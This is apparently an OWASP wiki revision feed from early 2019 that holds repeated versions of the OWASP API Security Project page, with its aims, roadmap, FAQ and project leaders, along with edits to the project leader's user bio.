   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQ=&lt;br /&gt;
&lt;br /&gt;
==How can I participate in your project?==&lt;br /&gt;
This project welcomes contributors of all sorts. The easiest way to get involved is to contact the Project Leader, and indicate that you're willing to help.&lt;br /&gt;
&lt;br /&gt;
==What type of contributors are you seeking?==&lt;br /&gt;
We're currently looking for software developers who have experience building out resilient APIs, and security assessors who have assessed APIs. This project is currently in the &amp;quot;research&amp;quot; stage, meaning that the more you can contribute to building out the project, the better!&lt;br /&gt;
&lt;br /&gt;
==Can I still participate if I'm not a developer/assessor?==&lt;br /&gt;
Sure -- we just need to figure out the correct role. If you're strong with technical writing, that would be great; if there are other skill sets you think you can bring to the table, please let us know.&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is small, but will be maintained by volunteers. If you'd like to volunteer, please contact the Project Leader.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map and Getting Involved =&lt;br /&gt;
[[File:API Security Project Road map 2019.png|alt=API Security Project Road map 2019|none|API Security Project Road map 2019]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Please refer to the [https://www.owasp.org/index.php/OWASP_API_Security_Project primary wiki page] to learn about this project.&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=247934</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=247934"/>
				<updated>2019-02-27T14:30:20Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Added API Security Project Road map 2019&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP API Security Project==&lt;br /&gt;
&lt;br /&gt;
=== [24-Dec-2018] ===&lt;br /&gt;
'''The OWASP API Security Project is now under new leadership.'''&lt;br /&gt;
'''A new roadmap and call for contribution will be published by the end of Feb 2019.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This project is designed to address the ever-increasing number of organizations that are deploying potentially sensitive APIs as part of their software offerings. These APIs are used for internal tasks and to interface with third parties. Unfortunately, many APIs do not undergo the rigorous security testing that would render them secure from attack.&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to provide value to software developers and security assessors by underscoring the potential risks in insecure APIs and illustrating how these risks may be mitigated. In order to facilitate this goal, the OWASP API Security Project will create and maintain a '''Top 10 API Security Risks''' document, as well as a '''documentation portal''' for best practices when creating or assessing APIs.&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
While working as developers or information security consultants, many people have encountered APIs as part of a project. While there are some resources to help create and evaluate these projects (such as the OWASP REST Security Cheat Sheet), there has not be a comprehensive security project designed to assist builders, breakers, and defenders in the community.&lt;br /&gt;
&lt;br /&gt;
This project aims to create:&lt;br /&gt;
&lt;br /&gt;
* The OWASP Top Ten API Security Risks document, which can easily underscore the most common risks in the area.&lt;br /&gt;
* Create a documentation portal for developers to build APIs in a secure manner.&lt;br /&gt;
* Work with the security community to maintain living documents that evolve with security trends.&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is this project? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to deliver actionable documentation on creating and deploying verifiably secure web APIs, as well as illustrating the major risks and shortfalls that APIs may encounter. By helping developers create resilient software, and helping assessors understand the subtle risks an API may entail, the goal of this project is to bring security to an increasingly programmatic world.&lt;br /&gt;
&lt;br /&gt;
The primary deliverables of this project are the '''OWASP Top Ten API Security Risks''' and a secure API development '''documentation portal.'''&lt;br /&gt;
&lt;br /&gt;
== Presentation ==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project will be presented at [https://telaviv.appsecglobal.org/ OWASP Global AppSec Tel Aviv, May 2019].&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.owasp.org/index.php/User:ErezYalon Erez Yalon]&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[REST_Security_Cheat_Sheet]]&lt;br /&gt;
* [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API Enterprise Security API]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
Once API Security documents are created, they will be available for direct download here.&lt;br /&gt;
&lt;br /&gt;
The initial version of this document, including an up-to-date table of contents, is available [https://www.owasp.org/images/f/f6/Owasp_api_security_toc.pdf here].&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
&lt;br /&gt;
There has not yet been press coverage of this project.&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQ=&lt;br /&gt;
&lt;br /&gt;
==How can I participate in your project?==&lt;br /&gt;
This project welcomes contributors of all sorts. The easiest way to get involved is to contact the Project Leader, and indicate that you're willing to help.&lt;br /&gt;
&lt;br /&gt;
==What type of contributors are you seeking?==&lt;br /&gt;
We're currently looking for software developers who have experience building out resilient APIs, and security assessors who have assessed APIs. This project is currently in the &amp;quot;research&amp;quot; stage, meaning that the more you can contribute to building out the project, the better!&lt;br /&gt;
&lt;br /&gt;
==Can I still participate if I'm not a developer/assessor?==&lt;br /&gt;
Sure -- we just need to figure out the correct role. If you're strong with technical writing, that would be great; if there are other skill sets you think you can bring to the table, please let us know.&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is small, but will be maintained by volunteers. If you'd like to volunteer, please contact the Project Leader.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map and Getting Involved =&lt;br /&gt;
[[File:API Security Project Road map 2019.png|alt=API Security Project Road map 2019|thumb|API Security Project Road map 2019]]&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Please refer to the [https://www.owasp.org/index.php/OWASP_API_Security_Project primary wiki page] to learn about this project.&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:API_Security_Project_Road_map_2019.png&amp;diff=247933</id>
		<title>File:API Security Project Road map 2019.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:API_Security_Project_Road_map_2019.png&amp;diff=247933"/>
				<updated>2019-02-27T14:29:06Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;API Security Project Road map 2019&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=User:ErezYalon&amp;diff=247660</id>
		<title>User:ErezYalon</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=User:ErezYalon&amp;diff=247660"/>
				<updated>2019-02-19T06:14:35Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: /* Bio */  Changed email to image&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Bio ==&lt;br /&gt;
Erez Yalon is the leader of the OWASP API Security project and the Head of Security Research at [http://www.checkmarx.com/ Checkmarx].&lt;br /&gt;
* Speaker in OWASP events: AppSec IL 2016, AppSec EU 2017, Appsec US 2018.&lt;br /&gt;
* Speaker in other events: DEF CON 26, BSides Las Vegas 2018, Nullcon 2018, CyberWeek TLV 2017.&lt;br /&gt;
* Contributing to OWASP projects.&lt;br /&gt;
* Conducting OWASP Top 10 workshops in universities&lt;br /&gt;
Contact: &lt;br /&gt;
[[File:Emailaddress.png]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Emailaddress.png&amp;diff=247659</id>
		<title>File:Emailaddress.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Emailaddress.png&amp;diff=247659"/>
				<updated>2019-02-19T06:12:18Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;email address&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=User:ErezYalon&amp;diff=247658</id>
		<title>User:ErezYalon</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=User:ErezYalon&amp;diff=247658"/>
				<updated>2019-02-19T06:09:27Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: added email address&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Bio ==&lt;br /&gt;
Erez Yalon is the leader of the OWASP API Security project and the Head of Security Research at [http://www.checkmarx.com/ Checkmarx].&lt;br /&gt;
* Speaker in OWASP events: AppSec IL 2016, AppSec EU 2017, Appsec US 2018.&lt;br /&gt;
* Speaker in other events: DEF CON 26, BSides Las Vegas 2018, Nullcon 2018, CyberWeek TLV 2017.&lt;br /&gt;
* Contributing to OWASP projects.&lt;br /&gt;
* Conducting OWASP Top 10 workshops in universities&lt;br /&gt;
Contact: erez.yalon@owasp.org&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=User:ErezYalon&amp;diff=247657</id>
		<title>User:ErezYalon</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=User:ErezYalon&amp;diff=247657"/>
				<updated>2019-02-19T06:05:22Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Updated bio&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Bio ==&lt;br /&gt;
Erez Yalon is the leader of the OWASP API Security project and the Head of Security Research at [http://www.checkmarx.com/ Checkmarx].&lt;br /&gt;
* Speaker in OWASP events: AppSec IL 2016, AppSec EU 2017, Appsec US 2018.&lt;br /&gt;
* Speaker in other events: DEF CON 26, BSides Las Vegas 2018, Nullcon 2018, CyberWeek TLV 2017.&lt;br /&gt;
* Contributing to OWASP projects.&lt;br /&gt;
* Conducting OWASP Top 10 workshops in universities&lt;br /&gt;
Contact: [mailto:erez.yalon@owasp.org erez.yalon@owasp.org]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=247656</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=247656"/>
				<updated>2019-02-19T05:56:58Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Added date for project publication&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP API Security Project==&lt;br /&gt;
&lt;br /&gt;
=== [24-Dec-2018] ===&lt;br /&gt;
'''The OWASP API Security Project is now under new leadership.'''&lt;br /&gt;
'''A new roadmap and call for contribution will be published by the end of Feb 2019.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This project is designed to address the ever-increasing number of organizations that are deploying potentially sensitive APIs as part of their software offerings. These APIs are used for internal tasks and to interface with third parties. Unfortunately, many APIs do not undergo the rigorous security testing that would render them secure from attack.&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to provide value to software developers and security assessors by underscoring the potential risks in insecure APIs and illustrating how these risks may be mitigated. In order to facilitate this goal, the OWASP API Security Project will create and maintain a '''Top 10 API Security Risks''' document, as well as a '''documentation portal''' for best practices when creating or assessing APIs.&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
While working as developers or information security consultants, many people have encountered APIs as part of a project. While there are some resources to help create and evaluate these projects (such as the OWASP REST Security Cheat Sheet), there has not be a comprehensive security project designed to assist builders, breakers, and defenders in the community.&lt;br /&gt;
&lt;br /&gt;
This project aims to create:&lt;br /&gt;
&lt;br /&gt;
* The OWASP Top Ten API Security Risks document, which can easily underscore the most common risks in the area.&lt;br /&gt;
* Create a documentation portal for developers to build APIs in a secure manner.&lt;br /&gt;
* Work with the security community to maintain living documents that evolve with security trends.&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is this project? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to deliver actionable documentation on creating and deploying verifiably secure web APIs, as well as illustrating the major risks and shortfalls that APIs may encounter. By helping developers create resilient software, and helping assessors understand the subtle risks an API may entail, the goal of this project is to bring security to an increasingly programmatic world.&lt;br /&gt;
&lt;br /&gt;
The primary deliverables of this project are the '''OWASP Top Ten API Security Risks''' and a secure API development '''documentation portal.'''&lt;br /&gt;
&lt;br /&gt;
== Presentation ==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project will be presented at [https://telaviv.appsecglobal.org/ OWASP Global AppSec Tel Aviv, May 2019].&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.owasp.org/index.php/User:ErezYalon Erez Yalon]&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[REST_Security_Cheat_Sheet]]&lt;br /&gt;
* [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API Enterprise Security API]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
Once API Security documents are created, they will be available for direct download here.&lt;br /&gt;
&lt;br /&gt;
The initial version of this document, including an up-to-date table of contents, is available [https://www.owasp.org/images/f/f6/Owasp_api_security_toc.pdf here].&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
&lt;br /&gt;
There has not yet been press coverage of this project.&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQ=&lt;br /&gt;
&lt;br /&gt;
==How can I participate in your project?==&lt;br /&gt;
This project welcomes contributors of all sorts. The easiest way to get involved is to contact the Project Leader, and indicate that you're willing to help.&lt;br /&gt;
&lt;br /&gt;
==What type of contributors are you seeking?==&lt;br /&gt;
We're currently looking for software developers who have experience building out resilient APIs, and security assessors who have assessed APIs. This project is currently in the &amp;quot;research&amp;quot; stage, meaning that the more you can contribute to building out the project, the better!&lt;br /&gt;
&lt;br /&gt;
==Can I still participate if I'm not a developer/assessor?==&lt;br /&gt;
Sure -- we just need to figure out the correct role. If you're strong with technical writing, that would be great; if there are other skill sets you think you can bring to the table, please let us know.&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is small, but will be maintained by volunteers. If you'd like to volunteer, please contact the Project Leader.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map and Getting Involved =&lt;br /&gt;
&lt;br /&gt;
The roadmap for this project is straightforward: we'll begin by conducting research and seeking feedback from developers and security auditors on the problems they most frequently encounter via web-based APIs. We'll create, from this research, the OWASP Top Ten API Security Risks, a sub-project of the API Security Project. Once this document is created (and maintained), we will also create guidelines in order to demonstrate each of the risks (as well as other, non-top-ten risks) and illustrate how to prevent them.&lt;br /&gt;
&lt;br /&gt;
'''Q4 2015 Priorities'''&lt;br /&gt;
* Establish the project, including mailing list, wiki page, etc.&lt;br /&gt;
* Conduct PR-related activities to involve the community at large.&lt;br /&gt;
* Conduct research to understand widely-accepted risks in APIs&lt;br /&gt;
* Compile Top Ten API Security Risks&lt;br /&gt;
* Publish and Publicize Top Ten API Security Risks&lt;br /&gt;
* Use data gathered in process to &amp;quot;reverse&amp;quot; the Top Ten, in order to create a Secure Development deliverable for APIs&lt;br /&gt;
&lt;br /&gt;
We'd love for you to get involved with this project if you feel you can contribute! Please contact the Project Leader to better understand how you can volunteer.&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Please refer to the [https://www.owasp.org/index.php/OWASP_API_Security_Project primary wiki page] to learn about this project.&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=247655</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=247655"/>
				<updated>2019-02-19T05:52:53Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Update publication date&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP API Security Project==&lt;br /&gt;
&lt;br /&gt;
=== [24-Dec-2018] ===&lt;br /&gt;
'''The OWASP API Security Project is now under new leadership.'''&lt;br /&gt;
'''A new roadmap and call for contribution will be published by the end of Feb 2019.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This project is designed to address the ever-increasing number of organizations that are deploying potentially sensitive APIs as part of their software offerings. These APIs are used for internal tasks and to interface with third parties. Unfortunately, many APIs do not undergo the rigorous security testing that would render them secure from attack.&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to provide value to software developers and security assessors by underscoring the potential risks in insecure APIs and illustrating how these risks may be mitigated. In order to facilitate this goal, the OWASP API Security Project will create and maintain a '''Top 10 API Security Risks''' document, as well as a '''documentation portal''' for best practices when creating or assessing APIs.&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
While working as developers or information security consultants, many people have encountered APIs as part of a project. While there are some resources to help create and evaluate these projects (such as the OWASP REST Security Cheat Sheet), there has not be a comprehensive security project designed to assist builders, breakers, and defenders in the community.&lt;br /&gt;
&lt;br /&gt;
This project aims to create:&lt;br /&gt;
&lt;br /&gt;
* The OWASP Top Ten API Security Risks document, which can easily underscore the most common risks in the area.&lt;br /&gt;
* Create a documentation portal for developers to build APIs in a secure manner.&lt;br /&gt;
* Work with the security community to maintain living documents that evolve with security trends.&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is this project? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to deliver actionable documentation on creating and deploying verifiably secure web APIs, as well as illustrating the major risks and shortfalls that APIs may encounter. By helping developers create resilient software, and helping assessors understand the subtle risks an API may entail, the goal of this project is to bring security to an increasingly programmatic world.&lt;br /&gt;
&lt;br /&gt;
The primary deliverables of this project are the '''OWASP Top Ten API Security Risks''' and a secure API development '''documentation portal.'''&lt;br /&gt;
&lt;br /&gt;
